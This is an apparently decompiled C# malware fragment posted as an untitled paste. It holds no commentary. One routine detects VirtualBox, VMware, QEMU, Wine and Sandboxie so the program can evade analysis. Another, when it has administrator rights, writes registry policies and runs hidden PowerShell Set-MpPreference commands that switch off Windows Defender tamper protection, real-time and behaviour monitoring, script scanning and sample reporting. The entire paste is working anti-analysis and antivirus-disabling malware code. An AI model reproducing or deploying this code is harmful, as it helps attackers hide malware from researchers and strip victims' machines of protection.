Advertisement
Guest User

Untitled

a guest
Jul 26th, 2020
119
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ===
  2. public static bool smethod_2()
  3. {
  4.   bool result;
  5.   if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX"))
  6.   {
  7.     result = true;
  8.   }
  9.   else if (Class0.smethod_0("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX"))
  10.   {
  11.     result = true;
  12.   }
  13.   else if (Class0.smethod_0("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX"))
  14.   {
  15.     result = true;
  16.   }
  17.   else if (Operators.CompareString(Class0.smethod_0("SOFTWARE\\Oracle\\VirtualBox Guest Additions", string.Empty), "noValueButYesKey", false) == 0)
  18.   {
  19.     result = true;
  20.   }
  21.   else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  22.   {
  23.     result = true;
  24.   }
  25.   else if (Operators.CompareString(Class0.smethod_0("SOFTWARE\\VMware, Inc.\\VMware Tools", string.Empty), "noValueButYesKey", false) == 0)
  26.   {
  27.     result = true;
  28.   }
  29.   else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  30.   {
  31.     result = true;
  32.   }
  33.   else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  34.   {
  35.     result = true;
  36.   }
  37.   else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper()))
  38.   {
  39.     result = true;
  40.   }
  41.   else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE"))
  42.   {
  43.     result = true;
  44.   }
  45.   else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE"))
  46.   {
  47.     result = true;
  48.   }
  49.   else if (Class0.smethod_0("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\"))
  50.   {
  51.     result = true;
  52.   }
  53.   else if (Class0.GetProcAddress(Class0.GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0)
  54.   {
  55.     result = true;
  56.   }
  57.   else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU"))
  58.   {
  59.     result = true;
  60.   }
  61.   else if (!Class0.smethod_0("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU"))
  62.   {
  63.     ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2");
  64.     using (ManagementObjectCollection managementObjectCollection = new ManagementObjectSearcher(scope, new ObjectQuery("SELECT * FROM Win32_VideoController")).Get())
  65.     {
  66.       foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
  67.       {
  68.         ManagementObject managementObject = (ManagementObject)managementBaseObject;
  69.         if (Operators.CompareString(managementObject["Description"].ToString(), "VM Additions S3 Trio32/64", false) == 0)
  70.         {
  71.           return true;
  72.         }
  73.         if (Operators.CompareString(managementObject["Description"].ToString(), "S3 Trio32/64", false) == 0)
  74.         {
  75.           return true;
  76.         }
  77.         if (Operators.CompareString(managementObject["Description"].ToString(), "VirtualBox Graphics Adapter", false) == 0)
  78.         {
  79.           return true;
  80.         }
  81.         if (Operators.CompareString(managementObject["Description"].ToString(), "VMware SVGA II", false) == 0)
  82.         {
  83.           return true;
  84.         }
  85.         if (managementObject["Description"].ToString().ToUpper().Contains("VMWARE"))
  86.         {
  87.           return true;
  88.         }
  89.         if (Operators.CompareString(managementObject["Description"].ToString(), string.Empty, false) == 0)
  90.         {
  91.           return true;
  92.         }
  93.       }
  94.     }
  95.     result = false;
  96.   }
  97.   else
  98.   {
  99.     result = true;
  100.   }
  101.   return result;
  102. }
  103. ===
  104. public static bool smethod_1(string string_0)
  105. {
  106.   StringBuilder stringBuilder = new StringBuilder();
  107.   int num = 50;
  108.   Class0.GetUserName(stringBuilder, ref num);
  109.   return (int)Class0.GetModuleHandle("SbieDll.dll") != 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "USER", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "SANDBOX", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "VIRUS", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "MALWARE", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "SCHMIDTI", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "CURRENTUSER", false) == 0 || string_0.ToUpper().Contains("\\VIRUS") || string_0.ToUpper().Contains("SANDBOX") || string_0.ToUpper().Contains("SAMPLE") || Operators.CompareString(string_0, "C:\\file.exe", false) == 0 || (int)Class0.FindWindow("Afx:400000:0", (IntPtr)0) != 0;
  110. }
  111. ===
  112. using System;
  113. using System.Diagnostics;
  114. using System.Security.Principal;
  115. using Microsoft.Win32;
  116.  
  117. // Token: 0x02000015 RID: 21
  118. internal static class Class13
  119. {
  120.   // Token: 0x06000045 RID: 69 RVA: 0x00003760 File Offset: 0x00001960
  121.   public static void smethod_0()
  122.   {
  123.     if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
  124.     {
  125.       Class13.smethod_1("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
  126.       Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
  127.       Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
  128.       Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
  129.       Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
  130.       Class13.smethod_2();
  131.     }
  132.   }
  133.  
  134.   // Token: 0x06000046 RID: 70 RVA: 0x000037F0 File Offset: 0x000019F0
  135.   private static void smethod_1(string string_0, string string_1, string string_2)
  136.   {
  137.     try
  138.     {
  139.       using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(string_0, RegistryKeyPermissionCheck.ReadWriteSubTree))
  140.       {
  141.         if (registryKey == null)
  142.         {
  143.           Registry.LocalMachine.CreateSubKey(string_0).SetValue(string_1, string_2, RegistryValueKind.DWord);
  144.         }
  145.         else if (registryKey.GetValue(string_1) != string_2)
  146.         {
  147.           registryKey.SetValue(string_1, string_2, RegistryValueKind.DWord);
  148.         }
  149.       }
  150.     }
  151.     catch
  152.     {
  153.     }
  154.   }
  155.  
  156.   // Token: 0x06000047 RID: 71 RVA: 0x0000386C File Offset: 0x00001A6C
  157.   private static void smethod_2()
  158.   {
  159.     Process process = new Process
  160.     {
  161.       StartInfo = new ProcessStartInfo
  162.       {
  163.         FileName = "powershell",
  164.         Arguments = "Get-MpPreference -verbose",
  165.         UseShellExecute = false,
  166.         RedirectStandardOutput = true,
  167.         WindowStyle = ProcessWindowStyle.Hidden,
  168.         CreateNoWindow = true
  169.       }
  170.     };
  171.     process.Start();
  172.     while (!process.StandardOutput.EndOfStream)
  173.     {
  174.       string text = process.StandardOutput.ReadLine();
  175.       if (text.Contains("DisableRealtimeMonitoring") && text.Contains("False"))
  176.       {
  177.         Class13.smethod_3("Set-MpPreference -DisableRealtimeMonitoring $true");
  178.       }
  179.       else if (text.Contains("DisableBehaviorMonitoring") && text.Contains("False"))
  180.       {
  181.         Class13.smethod_3("Set-MpPreference -DisableBehaviorMonitoring $true");
  182.       }
  183.       else if (text.Contains("DisableBlockAtFirstSeen") && text.Contains("False"))
  184.       {
  185.         Class13.smethod_3("Set-MpPreference -DisableBlockAtFirstSeen $true");
  186.       }
  187.       else if (text.Contains("DisableIOAVProtection") && text.Contains("False"))
  188.       {
  189.         Class13.smethod_3("Set-MpPreference -DisableIOAVProtection $true");
  190.       }
  191.       else if (text.Contains("DisablePrivacyMode") && text.Contains("False"))
  192.       {
  193.         Class13.smethod_3("Set-MpPreference -DisablePrivacyMode $true");
  194.       }
  195.       else if (text.Contains("SignatureDisableUpdateOnStartupWithoutEngine") && text.Contains("False"))
  196.       {
  197.         Class13.smethod_3("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
  198.       }
  199.       else if (text.Contains("DisableArchiveScanning") && text.Contains("False"))
  200.       {
  201.         Class13.smethod_3("Set-MpPreference -DisableArchiveScanning $true");
  202.       }
  203.       else if (text.Contains("DisableIntrusionPreventionSystem") && text.Contains("False"))
  204.       {
  205.         Class13.smethod_3("Set-MpPreference -DisableIntrusionPreventionSystem $true");
  206.       }
  207.       else if (text.Contains("DisableScriptScanning") && text.Contains("False"))
  208.       {
  209.         Class13.smethod_3("Set-MpPreference -DisableScriptScanning $true");
  210.       }
  211.       else if (text.Contains("SubmitSamplesConsent") && !text.Contains("2"))
  212.       {
  213.         Class13.smethod_3("Set-MpPreference -SubmitSamplesConsent 2");
  214.       }
  215.       else if (text.Contains("MAPSReporting") && !text.Contains("0"))
  216.       {
  217.         Class13.smethod_3("Set-MpPreference -MAPSReporting 0");
  218.       }
  219.       else if (text.Contains("HighThreatDefaultAction") && !text.Contains("6"))
  220.       {
  221.         Class13.smethod_3("Set-MpPreference -HighThreatDefaultAction 6 -Force");
  222.       }
  223.       else if (text.Contains("ModerateThreatDefaultAction") && !text.Contains("6"))
  224.       {
  225.         Class13.smethod_3("Set-MpPreference -ModerateThreatDefaultAction 6");
  226.       }
  227.       else if (text.Contains("LowThreatDefaultAction") && !text.Contains("6"))
  228.       {
  229.         Class13.smethod_3("Set-MpPreference -LowThreatDefaultAction 6");
  230.       }
  231.       else if (text.Contains("SevereThreatDefaultAction") && !text.Contains("6"))
  232.       {
  233.         Class13.smethod_3("Set-MpPreference -SevereThreatDefaultAction 6");
  234.       }
  235.     }
  236.   }
  237.  
  238.   // Token: 0x06000048 RID: 72 RVA: 0x00003B84 File Offset: 0x00001D84
  239.   private static void smethod_3(string string_0)
  240.   {
  241.     Process process = new Process
  242.     {
  243.       StartInfo = new ProcessStartInfo
  244.       {
  245.         FileName = "powershell",
  246.         Arguments = string_0,
  247.         WindowStyle = ProcessWindowStyle.Hidden,
  248.         CreateNoWindow = true
  249.       }
  250.     };
  251.     process.Start();
  252.   }
  253. }
  254. ===
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement